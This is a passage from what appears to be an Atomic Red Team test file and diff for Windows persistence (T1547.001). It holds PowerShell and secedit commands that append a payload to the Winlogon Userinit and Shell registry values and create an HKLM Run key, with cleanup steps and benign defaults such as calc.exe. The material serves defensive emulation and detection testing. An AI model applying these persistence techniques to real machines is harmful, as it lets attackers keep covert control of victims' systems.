      $oldvalue = $(Get-ItemPropertyValue -Path  "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name "Userinit");
      Set-ItemProperty -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name "Userinit-backup" -Value "$oldvalue";
      $newvalue = $oldvalue + " #{payload}";
      Set-ItemProperty -Path  "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name "Userinit" -Value "$newvalue"
    cleanup_command: |-
      $oldvalue = $(Get-ItemPropertyValue -Path  "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name 'Userinit-backup');
      Set-ItemProperty -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name "Userinit" -Value "$oldvalue";
      Remove-ItemProperty -Path  "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name 'Userinit-backup'
    name: powershell
    elevation_required: true

- name: 'HKLM - Modify default System Shell - Winlogon Shell KEY Value '
  auto_generated_guid: 1d958c61-09c6-4d9e-b26b-4130314e520e
  description: | 
    This test change the default value of HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell from "explorer.exe" to the full path of "C:\Windows\explorer.exe" 
    to log a change to the key's default value without breaking boot sequence. 
    An atacker will alternatively replace this with a custom shell. 
  supported_platforms:
  - windows
  input_arguments:
    payload:
      description: what to run
      type: String
      default: C:\Windows\explorer.exe
  executor:
    command: |
      $oldvalue = $(Get-ItemPropertyValue -Path  "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name "Shell");
      Set-ItemProperty -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name "Shell-backup" -Value "$oldvalue";
      $newvalue = $oldvalue + ", #{payload}";
      Set-ItemProperty -Path  "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name "Shell" -Value "$newvalue"
    cleanup_command: |-
      $oldvalue = $(Get-ItemPropertyValue -Path  "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name 'Shell-backup');
      Set-ItemProperty -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name "Shell" -Value "$oldvalue";
      Remove-ItemProperty -Path  "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name 'Shell-backup'
    name: powershell
    elevation_required: true
- name: secedit used to create a Run key in the HKLM Hive
  auto_generated_guid: 14fdc3f1-6fc3-4556-8d36-aa89d9d42d02
  description: | 
    secedit allows to manipulate the HKLM hive of the Windows registry. This test creates a Run key with the keyname calc having calc.exe as the value in the HKLM hive.
    [Reference](https://blueteamops.medium.com/secedit-and-i-know-it-595056dee53d)
  supported_platforms:
  - windows
  input_arguments:
    ini_file:
      description: INI config template
      type: String
      default: $PathToAtomicsFolder\T1547.001\src\regtemplate.ini
    secedit_db:
      description: Custom secedit db
      type: string
      default: mytemplate.db
  executor:
    command: |
      secedit /import /db #{secedit_db} /cfg #{ini_file}
      secedit /configure /db #{secedit_db}
    cleanup_command: REG DELETE "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "calc" /f >nul 2>&1
    name: command_prompt
    elevation_required: true

atomics/T1547.001/T1547.001.yaml (diff)
@@ -331,4 +331,26 @@ atomic_tests:
       Remove-ItemProperty -Path  "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name 'Shell-backup'
     name: powershell
     elevation_required: true
-  
+- name: secedit used to create a Run key in the HKLM Hive
+  auto_generated_guid: 14fdc3f1-6fc3-4556-8d36-aa89d9d42d02
+  description: | 
+    secedit allows to manipulate the HKLM hive of the Windows registry. This test creates a Run key with the keyname calc having calc.exe as the value in the HKLM hive.
+    [Reference](https://blueteamops.medium.com/secedit-and-i-know-it-595056dee53d)
+  supported_platforms:
+  - windows
+  input_arguments:
+    ini_file:
+      description: INI config template
+      type: String
+      default: $PathToAtomicsFolder\T1547.001\src\regtemplate.ini
+    secedit_db:
+      description: Custom secedit db
+      type: string
+      default: mytemplate.db
+  executor:
+    command: |
+      secedit /import /db #{secedit_db} /cfg #{ini_file}
+      secedit /configure /db #{secedit_db}
+    cleanup_command: REG DELETE "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "calc" /f >nul 2>&1
+    name: command_prompt
+    elevation_required: true
